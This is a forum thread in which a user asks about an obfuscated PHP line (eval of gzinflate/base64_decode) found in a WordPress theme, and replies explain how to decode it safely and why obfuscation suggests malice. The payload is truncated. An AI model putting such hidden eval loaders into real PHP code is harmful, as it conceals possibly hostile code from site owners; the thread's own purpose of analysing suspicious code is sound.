OM2 Posted December 5, 2010 Share Posted December 5, 2010 I have some PHP code that looks really dodgy I was given a Wordpress theme to install for someone Don't know why, I just thought I would check a few of the files before I installed on my server I've always thought it would be easy to hijack a server by using malicious code Don't know if the code would make sense, but I thought I'd give a snippet: <? eval(gzinflate(base64_decode('HJzHrutIlkV/pWaVAAf0Dmh0gd57z0mD3ouiN1/fujXNvBCpiDh7ryXq6T//+z//+Vd1ZuM/zdt96jHbq3/ybKsI7P/KqpjL6p9/iyoq98ubjUMIfuMvrLpfTH0RWnsvwTx5R6skWkXZOkZ8VFMt4SyrqsBepeNfEDwLEARxu/B82qZjv5eimjQCMMuVkLVTsEpFs6plG6TmOpRw8N5dtHAneSuOS/LdMG4U15e7wS2WQ+O/iGg228H36YdsX/dcLu/Uv3dEvU3Hak3Dz82hOsfCnEFAgcpaKFC7MfoUVSsYv5BtRtXdXAzt7WrrNvjBsNlBx1fgAohc+C2jj4DdXxoEIBwRTjNBv3ME9iM7fnV1qsv5YjX+UIn725T6GpuXmX4/yjw8mKuQxWZtmj75/ndDVKJuklU3RHIsIKWJRHKgaVdSgGByGEol6x4HB9qGNCD3YSP13MPg0FWutzew6NgFSOCs1brvSLpEyCq9iYa/Vj33vgsO0C/bHQLAHbHFqToufGTWNsUkxTu/NKbG4djdTrfd+ARSGV4uar7gm/MRaRB11/F3fa4jfhkXpw9U41ZwUwsw39zDFANHN0Kx9aVC0Jk590jUSd51KFWkWPEZ+OHEuWmNBTTeA+4jy4HcclTf24n5njFhOabzHp4m2MM+rqGSsTrxD/DmJvxF9wtAye4JSlciWwpOvhrk0gjhGy2dRCQP8TO0e0LqKqgOhZBdXm/5+ ... ... ... WRAT37W3+ldgc82VddtuetUZ7xH2clfi+VxOKhhCKsTwKyZgZP5kV13qHwxIR1aJMfgax3Ipx6qKSdsmmaQ5oL3PROPx72pA+TK81pxRxJMb4jBDYl4By4QSTHJeEuoHUiRMUnw3FuuhYUD6BTnCQWFx533VWUDCR7xqMuAL8wMMN9M6EBTiILwyZTEwk589Z5tJxEy6nM4auIJwL7TCSOIicpIz61jrcXG3imuJx3zHq/HTLpHoFbO2lu3klsZySnQ7fAhztFEFVUwxhYVgVxQ62GOkVcbxydLJgWcbJZksvjvapHb1LLcXRCnXJfbb1VTYTKxZbBvvDtLNbqlaC/ortDoOKhGkSfd5NpltjIp9f5gq/4SOT9bNXqsk118wmR/M5xO+NsIAG+Vd+WXADiysXDczyPAnG3o870gkaC3rERGuxzhWTqYfpcGuWC4Xd1qOtNnMqInNpNo1SJsf1Zk+wjBkciD/mFBiXEbac7Qx9pgFq5X09LEHyeUvsbylh8O3b8v3y/sXA//3nn3/+8z///t9///1/'))); ?> The above is just a snippet of the begining and end I won't be installing the theme on my server! What is the code though?? What can it do? Is it likely to be malicious?? Thanks OM Link to comment https://forums.phpfreaks.com/topic/220749-dodgy-php-code/ Share on other sites More sharing options...
cigardude Posted December 6, 2010 Share Posted December 6, 2010 Save everything after base64_decode(' in to a text file. Rename the text file to .uue and open with winzip. Should decode the text file for you. Or make a new php page: $contents=(gzinflate(base64_decode('HJzHrutIlkV/pWaVAAf0Dmh0gd57z0mD3ouiN1/fujXNvBCpiDh7ryXq6T//+z//+Vd1ZuM/zdt96jHbq3/ybKsI7P/KqpjL6p9/i.........)); echo $contents; Link to comment https://forums.phpfreaks.com/topic/220749-dodgy-php-code/#findComment-1143429 Share on other sites More sharing options...
OM2 Posted December 6, 2010 Author Share Posted December 6, 2010 hmmm ok - i can do so u think it might not be malicious code in that case? would such code actually execute and do 'something'? the actual file was about 130kb - which is huge for a php file - i would assume that would be 10000 lines of code or something? let me know what u think thanks Link to comment https://forums.phpfreaks.com/topic/220749-dodgy-php-code/#findComment-1143434 Share on other sites More sharing options...
BlueSkyIS Posted December 6, 2010 Share Posted December 6, 2010 the code is obfuscated for one or two reasons: 1. to slightly prevent modification of the code and/or 2. it is malicious. as long as you remove the eval() from around the code, it will not execute. just like cigardude said. Link to comment https://forums.phpfreaks.com/topic/220749-dodgy-php-code/#findComment-1143437 Share on other sites More sharing options...
OM2 Posted December 6, 2010 Author Share Posted December 6, 2010 thanks - thats great advice Link to comment https://forums.phpfreaks.com/topic/220749-dodgy-php-code/#findComment-1143440 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.